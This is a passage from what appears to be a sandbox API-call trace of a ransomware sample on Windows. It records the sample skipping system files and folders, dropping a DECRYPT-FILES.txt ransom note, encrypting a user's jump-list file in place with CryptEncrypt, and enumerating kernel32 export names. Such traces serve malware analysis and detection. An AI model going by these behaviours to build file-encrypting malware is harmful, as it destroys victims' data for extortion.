cAlternateFileName="9HYCB9~1.LNK")) returned 1 [0080.012] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.012] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="autorun.inf") returned -1 [0080.012] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="boot.ini") returned -1 [0080.012] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="desktop.ini") returned -1 [0080.012] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="ntuser.dat") returned -1 [0080.012] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="iconcache.db") returned -1 [0080.012] lstrcmpiW (lpString1="9hYC b9 OAgc.lnk", lpString2="bootsect.bak") returned -1 [0080.013] lstrcatW (in: lpString1="AutomaticDestinations", lpString2="\\" | out: lpString1="AutomaticDestinations\\") returned="AutomaticDestinations\\" [0080.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Program Files") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch=":\\Windows") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Games\\") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\All Users") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="AhnLab") returned 0x0 [0080.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.013] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0080.014] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.014] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\jkbimi8.tmp") returned 105 [0080.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0080.015] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0080.015] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.015] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\DECRYPT-FILES.txt") returned 111 [0080.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0080.015] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0080.016] CloseHandle (hObject=0x45c) returned 1 [0080.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0080.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0080.016] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabe3b6c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe3b6c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0080.016] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.017] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabe3b6c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe3b6c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.017] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.017] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.017] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8a9028a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x144be, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="autorun.inf") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="boot.ini") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="desktop.ini") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="iconcache.db") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="bootsect.bak") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="thumbs.db") returned -1 [0080.017] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="Bootfont.bin") returned -1 [0080.017] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms") returned 41 [0080.017] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="lnk") returned -1 [0080.017] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="exe") returned -1 [0080.017] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="sys") returned -1 [0080.017] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="dll") returned -1 [0080.017] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0080.017] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms") returned 41 [0080.017] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0080.017] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="1b4dd67f29cb1962.automaticDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" [0080.017] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.018] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=83134) returned 1 [0080.018] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.018] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0080.018] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.018] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.018] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.020] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.020] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0080.022] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.022] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0080.023] CloseHandle (hObject=0x464) returned 1 [0080.023] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.023] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.024] CloseHandle (hObject=0x0) returned 0 [0080.024] CloseHandle (hObject=0x460) returned 1 [0080.025] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.025] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.026] GetTickCount () returned 0x114c7e2 [0080.026] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.027] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.027] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.027] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.027] lstrlenA (lpString="kernel32.dll") returned 12 [0080.027] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.027] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.027] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.027] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.027] lstrlenA (lpString="ADDATOMA") returned 8 [0080.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.027] lstrlenA (lpString="ADDATOMW") returned 8 [0080.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.028] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.028] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.028] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.028] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.028] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.028] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.028] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.028] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.028] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.028] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.028] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.028] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.028] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.028] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.028] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.028] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.028] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.028] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.029] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.029] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.029] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.029] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.029] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.029] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.029] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.029] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.029] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.029] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.029] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.029] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.029] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.029] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.029] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.029] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.029] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.029] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.030] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.030] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.030] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.030] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.030] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.030] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.030] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.030] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.030] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.030] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.030] lstrcpyA (in: 